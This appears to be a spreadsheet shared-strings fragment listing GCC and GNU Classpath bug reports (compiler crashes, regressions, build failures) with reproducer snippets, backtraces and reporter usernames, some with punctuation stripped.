  </si>
  <si>
    <t>[4.1 regression] -m64 -m32 no longer creates 32-bit object</t>
  </si>
  <si>
    <t>Up until
2005-06-13  Mark Mitchell  
        * config/i386/x86-64.h (ASM_SPEC): Explicitly pass --64 to the
        assembler in 64-bit mode.
change -m64 -m32 used to work on x86_64 (I know it is quite fragile and
on many arches doesn't DTRT) but now as the asm spec has:
%{m32:--32} %{-m64:--64} we for both -m64 -m32 and -m32 -m64 end up with
--32 --64 being passed to the assembler (in that order).
Guess best would be to say in *.opt rather than RejectNegative what the negative
of the option is (for m32 Negative(m64) and for m64 Negative(m32) or something
like that) and handle this in gcc.c/opts.c.</t>
  </si>
  <si>
    <t>mmitchel</t>
  </si>
  <si>
    <t>CLASSPATH-22151</t>
  </si>
  <si>
    <t>JInternalFrame causes OutOfMemory error when maximized.</t>
  </si>
  <si>
    <t>JInternalFrame causes OutOfMemory error when maximized.
Run the test case below maximize the JInternalFrame wait a while.  OutOfMemory
error.  
When the JInternalFrame is positioned at (1010) rather than (6060) the error
doesn't occur.
==TEST CASE==
import java.awt.*
import javax.swing.*
import java.io.*
public class OutOfMemory {
   public static void main(String[] a) throws IOException{
      JFrame myFrame = new JFrame(Outer)
      myFrame.setSize(300300)
      myFrame.setContentPane(new JDesktopPane())
      JInternalFrame f = new JInternalFrame(Internal)
      f.setSize(200200)
      f.setVisible(true)
      f.setClosable(true)
      f.setMaximizable(true)
      f.setResizable(true)
      f.setIconifiable(true)
      /* IF THE FOLLOWING LINE IS CHANGED TO f.setLocation (1010)
         no OutOfMemory error occurs! */
      f.setLocation(6050)
      myFrame.add(f)
      myFrame.setVisible(true)
   }
}</t>
  </si>
  <si>
    <t>abalkiss</t>
  </si>
  <si>
    <t>GCC-60869</t>
  </si>
  <si>
    <t>ICE on throw after invalid definition of __cxa_throw</t>
  </si>
  <si>
    <t>typedef void __cxa_throw(void * void *  void (*) (void *))
void f() { throw 1 }
gives
unhandled expression in get_expr_operands():
 &lt;type_decl 0x7f9eadd508a0 __cxa_throw
    type &lt;function_type 0x7f9eadd53d20 __cxa_throw
        type &lt;void_type 0x7f9eadb9c000 void VOID
            align 8 symtab 0 alias set -1 canonical type 0x7f9eadb9c000
            pointer_to_this &gt;
        QI
        size 
        unit size 
        align 8 symtab 0 alias set -1 canonical type 0x7f9eadd53c78
        arg-types 
            chain 
                chain 
                    chain &gt;&gt;&gt;&gt;
        pointer_to_this &gt;
    VOID file test2.cc line 1 col 14
    align 1 context 
    result 
        QI size  unit size 
        align 8 symtab 0 alias set -1 canonical type 0x7f9eadd53c78 arg-types 
        pointer_to_this &gt; chain &gt;
test2.cc: In function â€˜void f()â€™:
test2.cc:2:21: internal compiler error: in get_expr_operands at tree-ssa-operands.c:902
 void f() { throw 1 }
                     ^
0xcc445c get_expr_operands
        ../../gcc/gcc/tree-ssa-operands.c:902
0xcc4cd1 parse_ssa_operands
        ../../gcc/gcc/tree-ssa-operands.c:951
0xcc620a build_ssa_operands
        ../../gcc/gcc/tree-ssa-operands.c:966
0xcc620a update_stmt_operands(function* gimple_statement_base*)
        ../../gcc/gcc/tree-ssa-operands.c:1103
0xbf75e8 update_stmt
        ../../gcc/gcc/gimple-ssa.h:144
0xbf75e8 mark_def_sites
        ../../gcc/gcc/tree-into-ssa.c:675
0xbf75e8 mark_def_dom_walker::before_dom_children(basic_block_def*)
        ../../gcc/gcc/tree-into-ssa.c:2253
0x1044937 dom_walker::walk(basic_block_def*)
        ../../gcc/gcc/domwalk.c:177
0xbf6191 rewrite_into_ssa
        ../../gcc/gcc/tree-into-ssa.c:2331
0xbf6191 execute
        ../../gcc/gcc/tree-into-ssa.c:2403
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Sort of expected this ICEs on every version of GCC I can test right now (release versions of 4.1.2 to 4.8.2 and 4.9 as of about a month ago)</t>
  </si>
  <si>
    <t>GCC-68217</t>
  </si>
  <si>
    <t>Wrong constant folding</t>
  </si>
  <si>
    <t>GCC-6.0.0 miscompiles the following code.
$ cat error.c
int main(void){
    volatile int a = -1
    long long b = -9223372036854775807LL-1 // LLONG_MIN
    long long x = (a  // x == 0x8000000000000000
    if ( x &lt; 1LL ) {  } else { __builtin_abort() }
    return 0
}
$ gcc-6.0 error.c -O3 &amp;&amp; ./a.out
[1]    26572 abort (core dumped)  ./a.out
$ gcc-6.0 -v
Using built-in specs.
COLLECT_GCC=gcc-6.0
COLLECT_LTO_WRAPPER=$HOME/opt/gcc-6.0.0/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc/configure --prefix=$HOME/opt/gcc-6.0.0 --enable-languages=c --program-suffix=-6.0
Thread model: posix
gcc version 6.0.0 20151105 (experimental) (GCC)</t>
  </si>
  <si>
    <t>ishiura-compiler</t>
  </si>
  <si>
    <t>GCC-43511</t>
  </si>
  <si>
    <t>[4.5 Regression] Configure error at stage 1 in i386/libgomp</t>
  </si>
  <si>
    <t>Bootstrapping revision 157711 failed at stage 1 with:
...
checking for shared libgcc... yes
configure: WARNING: === You have requested some kind of symbol versioning but
configure: WARNING: === either you are not using a supported linker or you are
configure: WARNING: === not building a shared libgcc_s (which is required).
configure: WARNING: === Symbol versioning will be disabled.
checking whether the target supports .symver directive... no
configure: versioning on shared library symbols is no
checking whether the target supports __sync_*_compare_and_swap... yes
configure: updating cache ./config.cache
configure: error: unsupported system cannot find sizeof (omp_lock_t)
make[2]: *** [configure-stage1-target-libgomp] Error 1
make[1]: *** [stage1-bubble] Error 2
make: *** [all] Error 2
I'll attach the result of 'diff -up ./x86_64-apple-darwin10/libgomp/config.log ./x86_64-apple-darwin10/i386/libgomp/config.log'.
This PR may be related to PR43287 the main difference is that the latter is intermittent while the former seems reproducible.</t>
  </si>
  <si>
    <t>GCC-61553</t>
  </si>
  <si>
    <t>__atomic_store with non-pointer arg ICE</t>
  </si>
  <si>
    <t>Created attachment 32968
faulty source code
(On Debian/Sid/AMD64)
The attached file (with an incorrect __atomic_store) gives an ICE.
badatomicstore.c: In function â€˜clear_s1â€™:
badatomicstore.c:9:6: internal compiler error: in tree_to_uhwi at tree.h:3660
      __atomic_store(s-&gt;i_name NULL __ATOMIC_SEQ_CST)
      ^
Please submit a full bug report
Of course the instruction is incorrect it should be
     __atomic_store_n(</t>
  </si>
  <si>
    <t>bstarynk</t>
  </si>
  <si>
    <t>GCC-41064</t>
  </si>
  <si>
    <t>[4.4 Regression]: build breakage for cris-elf building newlib ICE in extract_insn from r150726</t>
  </si>
  <si>
    <t>This bug was hidden at the time of its introduction by PR41031.
With revision 150725 plus the patch at  a build was successful with reasonable test-results.
From revision 150726 plus the same patch a build failed as follows.
The build failure was fully exposed (no local patches needed) from revision 150702 and on (when the equivalent patch was committed):
/tmp/hpautotest-gcc1/cris-elf/gccobj/./gcc/xgcc -B/tmp/hpautotest-gcc1/cris-elf/gccobj/./gcc/ -nostdinc -B/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/v32/newlib/ -isystem /tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/v32/newlib/targ-include -isystem /tmp/hpautotest-gcc1/gcc/newlib/libc/include -B/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/v32/libgloss/cris -L/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/v32/libgloss/libnosys -L/tmp/hpautotest-gcc1/gcc/libgloss/cris -B/tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/bin/ -B/tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/lib/ -isystem /tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/include -isystem /tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/sys-include  -march=v32 -mbest-lib-options -DPACKAGE_NAME=\newlib\ -DPACKAGE_TARNAME=\newlib\ -DPACKAGE_VERSION=\1.17.0\ -DPACKAGE_STRING=\newlib\ 1.17.0\ -DPACKAGE_BUGREPORT=\\  -I. -I/tmp/hpautotest-gcc1/gcc/newlib/libc/search -O2 -DHAVE_RENAME -D_USE_WRITE -DCOMPACT_CTYPE -fno-builtin      -g -O2  -march=v32 -mbest-lib-options -c -o lib_a-hash_bigkey.o `test -f 'hash_bigkey.c' || echo '/tmp/hpautotest-gcc1/gcc/newlib/libc/search/'`hash_bigkey.c
/tmp/hpautotest-gcc1/gcc/newlib/libc/search/hash_bigkey.c: In function '__big_insert':
/tmp/hpautotest-gcc1/gcc/newlib/libc/search/hash_bigkey.c:175:1: error: unrecognizable insn:
(insn 22 392 25 2 /tmp/hpautotest-gcc1/gcc/newlib/libc/search/hash_bigkey.c:105 (set (reg/v/f:SI 8 r8 [orig:41 val_data ] [41])
        (mem/s/f:SI (post_inc:SI (reg:SI 15 acr)) [15 val_30(D)-&gt;data+0 S4 A8])) -1 (expr_list:REG_INC (reg:SI 15 acr)
        (nil)))
/tmp/hpautotest-gcc1/gcc/newlib/libc/search/hash_bigkey.c:175:1: internal compiler error: in extract_insn at recog.c:2089
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[8]: *** [lib_a-hash_bigkey.o] Error 1
make[8]: Leaving directory `/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/v32/newlib/libc/search'
Author of patch CC:ed.  The invalidity is the post_inc on R15 a register which cannot be post-incremented.
A brief look with gdb reveals the immediate cause of the ICE is the extract_insn call in the context of the change of revision 150726. Applying it to a non-recognizable insn a no-no. I don't quite understand why this didn't also happen before revision 150726 as the same call was there then too but I'll have another look.
Preprocessed code to be attached.</t>
  </si>
  <si>
    <t>GCC-41535</t>
  </si>
  <si>
    <t>[4.5 Regression] Broken var location info after scheduling</t>
  </si>
  <si>
    <t>On s390x I see broken debug info generated for the attached C++
testcase (compile with -O2 -g -fPIC).
The debug info contains a symbol reference with a @GOTENT modifier
what should not happen (and is not accepted by gas):
.LLST3:
	.8byte	.LVL3-.Ltext0
	.8byte	.LVL4-.Ltext0
	.2byte	0xa
	.byte	0x9e
	.uleb128 0x8
	.8byte	_ZTISt12future_error@GOTENT
	.8byte	0x0
	.8byte	0x0
The problem is that the sched2 pass breaks the variable location
information by moving an insn setting r1 over a var_location debug
insn describing a variable location as being r1.
in 202.split4:
29:	var_location r10
33:	var_location r13 + 8
34:	var_location r10
30:	r1 = &amp;(A got entry)
31:	r1 = [r1]
83:	[r13] = r2
32:	r1 = [r1]
35:	var_location A =&gt; r1  &lt;-- problematic location information 
36:	[r13 + 8] = r10
37:	[r13 + 16] = r1
79:	r1 = &amp;(B got entry)
41:	r3 = [r1]
in 203.sched2:
...
32:	r1 = [r1]
37:	[r13 + 16] = r1
79:	r1 = &amp;(B got entry)  &lt;-- insn moved over 35
83:	[r13] = r2
29:	var_location r10
33:	var_location r13 + 8
34:	var_location r10
35:	var_location r1  !!! the variable location gets corrupted
		     	 since insn 79 has been moved over it
36:	[r13 + 8] = r10
41:	r3 = [r1]
The variable locations are intended to stay right after the insn which
does the relevant assignment by generating an ANTI dep between them
but we also create deps between unrelated insns:
sched-deps.c:2790
    if (prev &amp;&amp; NONDEBUG_INSN_P (prev))
      add_dependence (insn prev REG_DEP_ANTI)
This code creates a dependency between 83 and 29 (although the
assignment is unrelated). This together with the fact that all debug
insns are always been kept from being moved over each other makes all
the debug insns to get stuck after insn 83. Although in order to keep
the information correct insn 35 has to stay after 32.</t>
  </si>
  <si>
    <t>aoliva</t>
  </si>
  <si>
    <t>krebbel</t>
  </si>
  <si>
    <t>GCC-50280</t>
  </si>
  <si>
    <t>Incorrect type deduced for T&amp; when passed a const bitfield</t>
  </si>
  <si>
    <t>$ cat test.cc
struct S { int bf : 3 }
template
void make_pair(_T1&amp; __x) {}
void foo() {
  const S s = S()
  make_pair(s.bf)
}
$ g++-4.6 -c test.cc
test.cc: In function 'void foo()':
test.cc:8:17: error: cannot bind bitfield 's.S::bf' to 'int&amp;'
$ clang++ -c test.cc
$ 
It looks like gcc is deducing the parameter type from the base type of the bitfield rather than its type modified by qualifiers on the containing object.
This seems related to PR43663 but isn't the same issue because using const _T1&amp; in make_pair makes this compile.
This showed up when compiling a make_pair(val bitfield) call in C++0x mode that worked in C++98 mode but the underlying issue is present in C++98 too.</t>
  </si>
  <si>
    <t>jyasskin</t>
  </si>
  <si>
    <t>GCC-60620</t>
  </si>
  <si>
    <t>missing gnattools dependency causes highly parallel build failure with --disable-bootstrap</t>
  </si>
  <si>
    <t>GCC 4.9.0 has been brought into FreeBSD ports (lang/gcc-aux) which supports 4 platforms: i386-FreeBSD i386-DragonFly x86_64-FreeBSD and x86-64-DragonFly.  On machines with low -j inputs (say -j4) it would build fine but on powerful machines with like -j8 or greater we'd seen a clean jail (no base compiler lib in path) build break on gnattools such as this:
checking for scalbnl... ../../xg++ -B../../ -B../../../x86_64-aux-freebsd10.0/libstdc++-v3/src/.libs -B../../../x86_64-aux-freebsd10.0/libstdc++-v3/libsupc++/.libs -L../../../x86_64-aux-freebsd10.0/libstdc++-v3/src/.libs -L../../../x86_64-aux-freebsd10.0/libstdc++-v3/libsupc++/.libs -static-libstdc++ -static-libgcc -I- -I../rts -I. -I/work/a/ports/lang/gcc-aux/work/gcc-4.9-20140316/gcc/ada -static-libstdc++ -static-libgcc  -DIN_GCC  -g -O2 -W -Wall -o ../../gnatlink b_gnatl.o gnatlink.o a-except.o ali.o alloc.o butil.o casing.o csets.o debug.o fmap.o fname.o gnatvsn.o hostparm.o indepsw.o interfac.o i-c.o i-cstrin.o namet.o opt.o osint.o output.o rident.o s-exctab.o s-secsta.o s-stalib.o s-stoele.o sdefault.o snames.o stylesw.o switch.o system.o table.o targparm.o tree_io.o types.o validsw.o widechar.o ../link.o ../targext.o ../../ggc-none.o ../../libcommon-target.a ../../libcommon.a ../../../libcpp/libcpp.a ../rts/libgnat.a ../../../intl/libintl.a  ../../../libbacktrace/.libs/libbacktrace.a ../../../libiberty/libiberty.a  
yes
checking for sinf... /usr/bin/ld: cannot find -lstdc++
collect2: error: ld returned 1 exit status
gmake[5]: *** [../../gnatlink] Error 1
gmake[5]: *** Waiting for unfinished jobs....
It seems this doesn't happen with a full bootstrap.  For reference this is a typical configuration:
/work/a/ports/lang/gcc-aux/work/gcc-4.9-20140316/configure --enable-languages=c\ c++\ ada\ fortran\ objc --build=x86_64-aux-freebsd10.0 --prefix=/usr/local/gcc-aux --with-system-zlib --with-gmp=/usr/local --with-mpfr=/usr/local --with-mpc=/usr/local  --enable-shared --enable-threads=posix --disable-libmudflap --disable-libgomp --disable-libssp --enable-libquadmath --enable-nls --disable-bootstrap
It appears the linking using g++ is intentional as -static-libstdc++ is passed so that means that libstdc++ is required to build gnattools but that dependency is not documented.  The following patches solved the parallel build problems with --disable-bootstrap that we were seeing:
--- Makefile.def.orig	2013-10-29 13:37:47.000000000 -0500
+++ Makefile.def
@@ -3366 +3367 @@ dependencies = { module=all-libcpp on=a
 dependencies = { module=all-fixincludes on=all-libiberty }
 dependencies = { module=all-gnattools on=all-target-libada }
+dependencies = { module=all-gnattools on=all-target-libstdc++-v3 }
 dependencies = { module=all-lto-plugin on=all-libiberty }
--- Makefile.in.orig	2014-03-07 07:58:27.000000000 -0500
+++ Makefile.in
@@ -467306 +467307 @@ all-stageprofile-libcpp: maybe-all-stage
 all-stagefeedback-libcpp: maybe-all-stagefeedback-intl
 all-fixincludes: maybe-all-libiberty
 all-gnattools: maybe-all-target-libada
+all-gnattools: maybe-all-target-libstdc++-v3
 all-lto-plugin: maybe-all-libiberty
 all-stage1-lto-plugin: maybe-all-stage1-libiberty
It should be a simple matter to confirm that libstdc++ is indeed required for gnattools and that it's not listed as a dependency.  It is also possible that gcc 4.8.x is affected by this but I cannot say as I have never tried to build that version nor do I know if libstdc++ is required for gnattools there.</t>
  </si>
  <si>
    <t>gnugcc</t>
  </si>
  <si>
    <t>GCC-6441</t>
  </si>
  <si>
    <t>web</t>
  </si>
  <si>
    <t>Pages are not XHTML</t>
  </si>
  <si>
    <t>The page
http://gcc.gnu.org/gcc-3.1/changes.html
claims to be valid XHTML but as of today it is not. The validator complains start with
    *  Line 155 column 4:
^
      Error: end tag for element ul which is not open try removing the end tag or check for improper nesting of elements
Release:
unknown</t>
  </si>
  <si>
    <t>loewis</t>
  </si>
  <si>
    <t>GCC-1992</t>
  </si>
  <si>
    <t>ICE compiling Tomcat</t>
  </si>
  <si>
    <t>./org/apache/tomcat/util/MimeHeaderField.java
./org/apache/tomcat/util/MimeHeaderField.java: In class `org.apache.tomcat.util.MimeHeaderField':
./org/apache/tomcat/util/MimeHeaderField.java: In method `org.apache.tomcat.util.MimeHeaderField.getBytes(byte[]int)':
./org/apache/tomcat/util/MimeHeaderField.java:330: Internal compiler error in expand_expr at expr.c:6152
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 2.97 20010214 (experimental)
Environment:
Configured with: ../gcc/configure --enable-threads=posix --prefix=/home/dyp/opt/gcc --enable-languages=c++f77java --enable-libstdcxx-v3
Linux 2.4.1-ac3
glibc 2.2.1
How-To-Repeat:
Compile the latest Tomcat release.</t>
  </si>
  <si>
    <t>dyp</t>
  </si>
  <si>
    <t>GCC-50672</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] ice: verify_ssa failed: no immediate_use list</t>
  </si>
  <si>
    <t>Created attachment 25448
C++ source code
I just tried to compile the ddd-3.3.12 package on latest trunk snapshot 
20111008 on an AMD x86_64 box.
The compiler said
ArcGraphE.C: In member function 'void ArcGraphEdge::makeLine(Widget const BoxRegion&amp; std::ostream&amp; const GraphGC&amp;) const':
ArcGraphE.C:97:6: error: no immediate_use list
for SSA_NAME: .MEM_986 in statement:
# .MEM_597 = VDEF 
LineGraphEdge::drawLine (D.34902_152 w_151(D) exposed_153(D) gc_154(D))
ArcGraphE.C:97:6: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-33620</t>
  </si>
  <si>
    <t>[4.3 regression] internal compiler error: canonical types differ for identical types const QList and const QList</t>
  </si>
  <si>
    <t>Compiling the attached preprocessed code with gcc 4.3 svn rev. 128893 (regardless of compiler flags) results in
project.cpp:2826: internal compiler error: canonical types differ for identical types const QList and const QList
Please submit a full bug report
See  for instructions.
This breaks building Qt 4.x.</t>
  </si>
  <si>
    <t>GCC-25806</t>
  </si>
  <si>
    <t>problems with functions returning array pointers?</t>
  </si>
  <si>
    <t>Hi!
This code
program a 
  real target :: storage(10)
  real :: s(5)
  print*x(5)
  s = 0
  s = x(5)
  print*s
contains
 function x(n) result(t)
   integer :: n
   real pointer :: t(:)
   t =&gt; storage(1:n)
!  allocate( t(n) )
   t = (/ (ii=1n) /)
 end function x
end program a
prints:
free(): invalid pointer 0x5012a0!
   1.000000       2.000000       3.000000       4.000000       5.000000
   0.000000       0.000000       0.000000       0.000000       0.000000
on a x86_64. If you delete s=0 statement the latter line will contain
values from uninitialized memory. 
gfortran --version
GNU Fortran 95 (GCC) 4.2.0 20060112 (experimental)
Copyright (C) 2005 Free Software Foundation Inc.
Is this supposed to work?
Regards Juha</t>
  </si>
  <si>
    <t>eedelman</t>
  </si>
  <si>
    <t>jpr</t>
  </si>
  <si>
    <t>GCC-3400</t>
  </si>
  <si>
    <t>doesn't compile simple hierarchy with overlaoding</t>
  </si>
  <si>
    <t>When trying to compile the program
class A {public:	void a() {}}class B: public A {public:	void a(int n) {}}int main(void){	B b	b.a()	return 0}
I get the error message:
test.cc: In function `int main()':
test.cc:15: no matching function for call to `B::a ()'
test.cc:8: candidates are: void B::a(int)
I believe the code is correct (so do all my colleagues). Changing the method name to 'b()' (or anything else) fixes the problem.  The code snippet does not exhibit good programming style but nonetheless it seems to be correct.
C++ books in my reach gave no help on the subject.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
SuSe Linux 7.2 on IBM Thinkpad A21p
How-To-Repeat:
Compile code with g++</t>
  </si>
  <si>
    <t>volker.reichenberger</t>
  </si>
  <si>
    <t>GCC-60909</t>
  </si>
  <si>
    <t>ICE: in extract_insn at recog.c:2202 (unrecognizable insn) with -mrdrnd and __builtin_ia32_rdrand32_step()</t>
  </si>
  <si>
    <t>Created attachment 32645
reduced testcase
Compiler output:
$ gcc -mrdrnd testcase.c                           
testcase.c: In function 'foo':
testcase.c:8:1: error: unrecognizable insn:
 }
 ^
(insn 10 9 11 2 (set (mem/c:SI (plus:DI (reg/f:DI 78 virtual-stack-vars)
                (const_int -4 [0xfffffffffffffffc])) [0 i+0 S4 A32])
        (if_then_else:SI (geu (reg:CCC 17 flags)
                (const_int 0 [0]))
            (reg:SI 83)
            (reg:SI 85))) testcase.c:6 -1
     (nil))
testcase.c:8:1: internal compiler error: in extract_insn at recog.c:2202
0xac2df8 _fatal_insn(char const* rtx_def const* char const* int char const*)
        /mnt/svn/gcc-trunk/gcc/rtl-error.c:109
0xac2e88 _fatal_insn_not_found(rtx_def const* char const* int char const*)
        /mnt/svn/gcc-trunk/gcc/rtl-error.c:117
0xa788b6 extract_insn(rtx_def*)
        /mnt/svn/gcc-trunk/gcc/recog.c:2202
0x8d6557 instantiate_virtual_regs_in_insn
        /mnt/svn/gcc-trunk/gcc/function.c:1555
0x8d6557 instantiate_virtual_regs
        /mnt/svn/gcc-trunk/gcc/function.c:1921
0x8d6557 execute
        /mnt/svn/gcc-trunk/gcc/function.c:1972
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc -v                
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-209536-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/4.10.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-209536-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl
Thread model: posix
gcc version 4.10.0 20140420 (experimental) (GCC) 
Tested revisions:
r209536 - ICE
4.9 r209346 - ICE
4.8 r209342 - ICE
4.7 r209345 - ICE
4.6 r197894 - ICE
4.5.4 - -mrdrnd not supported</t>
  </si>
  <si>
    <t>GCC-58436</t>
  </si>
  <si>
    <t>[4.9 Regression][OOP] ICE (segfault) in generate_finalization_wrapper for CLASS(*)</t>
  </si>
  <si>
    <t>The following code leads to an ICE while finalization is a new 4.9 feature the code doesn't require it (and works with GCC 4.8). Hence I labelled it as regression.
class(*) allocatable :: var
end
Crashes the compiler with a segfault at
0x572cbf generate_finalization_wrapper
        ../../gcc/fortran/class.c:1518
0x572cbf gfc_find_derived_vtab(gfc_symbol*)
        ../../gcc/fortran/class.c:2317
0x5757cd gfc_build_class_symbol(gfc_typespec* symbol_attribute* gfc_array_spec** bool)
        ../../gcc/fortran/class.c:652</t>
  </si>
  <si>
    <t>GCC-65222</t>
  </si>
  <si>
    <t>[5 Regression] -mtune= or -march=: Not all options not documented: slm knl shanghai istanbul</t>
  </si>
  <si>
    <t>At least the following options for -mtune= or -march= are not documented:
slm knl shanghai istanbul
Marked as regression as knl is new since GCC 5. slm should be simple as it is an alias of silvermont (new since GCC 4.9). shanghai and istanbul seem to exist since GCC 4.8.</t>
  </si>
  <si>
    <t>GCC-2315</t>
  </si>
  <si>
    <t>ICE with -O on x86 with mainline gcc</t>
  </si>
  <si>
    <t>When compiling glibc with -O2 or higher things are normally pretty good.  But only -O has often problems.  I'll start reporting these issues.  I'm testing the mainline but the same probably applies to the 3.0 release branch.
This one is an ICE.
Release:
gcc version 3.1 20010318 (experimental)
Environment:
i686 Linux 2.4
How-To-Repeat:
Compile the attached code with
  gcc -c -march=i686 -O -fPIC _itoa.i
Removing -march or -fPIC or using -O2 does not produce an ICE.</t>
  </si>
  <si>
    <t>drepper.fsp</t>
  </si>
  <si>
    <t>GCC-69810</t>
  </si>
  <si>
    <t>PowerPC64: unrecognizable insn</t>
  </si>
  <si>
    <t>Another csmith fail on trunk:
int a b
void fn1(void)
{
        signed char c
        long d
        int e
repeat:
        {
                int f = fn1
                e = f == 0 ? : 0 / f
                d = e ? : a
                c = -d
        }
        unsigned short g = c
        b = g == 0 ? : 0 / g
        if (b)
                goto repeat
}
# gcc -O1 testcase.c
...
testcase.c:22:1: error: unrecognizable insn:
 }
 ^
(insn 72 71 35 5 (set (reg:CC 75 7 [179])
        (compare:CC (reg:HI 7 7)
            (const_int 0 [0]))) crash1b.i:19 -1
     (nil))
crash1b.i:22:1: internal compiler error: in extract_insn at recog.c:2287
0x108128f3 _fatal_insn(char const* rtx_def const* char const* int char const*)
	../../gcc/gcc/rtl-error.c:108
0x10812957 _fatal_insn_not_found(rtx_def const* char const* int char const*)
	../../gcc/gcc/rtl-error.c:116
0x107d67e7 extract_insn(rtx_insn*)
	../../gcc/gcc/recog.c:2287
0x107d68af extract_insn_cached(rtx_insn*)
	../../gcc/gcc/recog.c:2178
0x104d24b7 cleanup_subreg_operands(rtx_insn*)
	../../gcc/gcc/final.c:3104
0x107d39b7 split_insn
	../../gcc/gcc/recog.c:2901
0x107d9aeb split_all_insns()
	../../gcc/gcc/recog.c:2955
0x107d9c2b rest_of_handle_split_after_reload
	../../gcc/gcc/recog.c:3891
0x107d9c2b execute
	../../gcc/gcc/recog.c:3920</t>
  </si>
  <si>
    <t>GCC-51931</t>
  </si>
  <si>
    <t>No support for MIPS16 long branches</t>
  </si>
  <si>
    <t>The MIPS port doesn't detect when MIPS16 branches are out of range
and it doesn't provide the same kind of branch around jump fallback
as it does for non-MIPS16 code.
This has always been a problem and shows up as a long-standing failure
in gcc.c-torture/compile/20001226-1.c and g++.dg/opt/longbranch1.C.
I've thought about various fixes such as saving a MIPS16 register
to $1 before using it as a scratch then restoring it in the branch
delay slot.  But there are various ugly cases.
The bug only triggers for very large functions and at least these days
there's a workaround: add __attribute__((nomips16)).</t>
  </si>
  <si>
    <t>rsandifo</t>
  </si>
  <si>
    <t>GCC-83898</t>
  </si>
  <si>
    <t>[6/7 Regression] ICE in gfc_conv_expr_descriptor at fortran/trans-array.c:7181</t>
  </si>
  <si>
    <t>Down to version 4.9 -- gfortran 4.8 seems to work :
$ cat z1.f90
program p
   associate (x =&gt; ['1'])
      print * x
   end associate
end
$ gfortran-8-20180114 -c z1.f90
z1.f90:3:0:
       print * x
internal compiler error: in gfc_conv_expr_descriptor at fortran/trans-array.c:7181
0x75a697 gfc_conv_expr_descriptor(gfc_se* gfc_expr*)
        ../../gcc/fortran/trans-array.c:7181
0x7b3293 trans_associate_var
        ../../gcc/fortran/trans-stmt.c:1594
0x7b3293 gfc_trans_block_construct(gfc_code*)
        ../../gcc/fortran/trans-stmt.c:1921
0x747a97 trans_code
        ../../gcc/fortran/trans.c:1924
0x76eb79 gfc_generate_function_code(gfc_namespace*)
        ../../gcc/fortran/trans-decl.c:6451
0x6fe980 translate_all_program_units
        ../../gcc/fortran/parse.c:6103
0x6fe980 gfc_parse_file()
        ../../gcc/fortran/parse.c:6306
0x744e5f gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-79431</t>
  </si>
  <si>
    <t>[6 Regression] ICE in get at cgraph.h:397</t>
  </si>
  <si>
    <t>Affects versions 6 and 7 (configured with --enable-checking=yes) :
(compiles with static int a)
$ cat z1.c
void fn1 ()
{
  int a
  #pragma omp declare target (a)
}
$ gcc-6 -fopenmp -c z1.c   # official release 6.3.1 20170131
$
$ gcc-7-20170205 -fopenmp -c z1.c
z1.c: In function 'fn1':
z1.c:4:11: internal compiler error: in get at cgraph.h:397
   #pragma omp declare target (a)
           ^~~
0x6d14d9 symtab_node::get(tree_node const*)
        ../../gcc/cgraph.h:394
0x6d14d9 c_parser_omp_declare_target
        ../../gcc/c/c-parser.c:16850
0x6d14d9 c_parser_omp_declare
        ../../gcc/c/c-parser.c:17290
0x6b406b c_parser_pragma
        ../../gcc/c/c-parser.c:10313
0x6d3f0e c_parser_compound_statement_nostart
        ../../gcc/c/c-parser.c:4875
0x6d44ce c_parser_compound_statement
        ../../gcc/c/c-parser.c:4740
0x6cf90c c_parser_declaration_or_fndef
        ../../gcc/c/c-parser.c:2112
0x6d791b c_parser_external_declaration
        ../../gcc/c/c-parser.c:1468
0x6d8379 c_parser_translation_unit
        ../../gcc/c/c-parser.c:1348
0x6d8379 c_parse_file()
        ../../gcc/c/c-parser.c:18185
0x736892 c_common_parse_file()
        ../../gcc/c-family/c-opts.c:1107</t>
  </si>
  <si>
    <t>GCC-19381</t>
  </si>
  <si>
    <t>ACATS c954a03 raises storage error at runtime on s390-linux</t>
  </si>
  <si>
    <t>.. C954A03 ACATS 2.5 05-01-11 13:00:05
---- C954A03 Requeue from an Accept with parameters to a Protected Entry 
                without parameters.
raised STORAGE_ERROR</t>
  </si>
  <si>
    <t>GCC-66113</t>
  </si>
  <si>
    <t>Variable n cannot appear in the expression with nested blocks</t>
  </si>
  <si>
    <t>ig25@linux-fd1f:~/Krempel/Block&gt; cat block.f90
program main
  integer :: n
  n = 3
  block
    block
      block
        real dimension(n) :: a
      end block
    end block
  end block
end program main
ig25@linux-fd1f:~/Krempel/Block&gt; gfortran block.f90
block.f90:7:24:
         real dimension(n) :: a
                        1
Error: Variable Â»nÂ« cannot appear in the expression at (1)
This is bogus.
Any solution should include the case of an arbitrary number
of nested blocks.</t>
  </si>
  <si>
    <t>tkoenig</t>
  </si>
  <si>
    <t>GCC-42747</t>
  </si>
  <si>
    <t>-mcpu=power7 (or -mvsx) does not generate the xssqrtdp instruction</t>
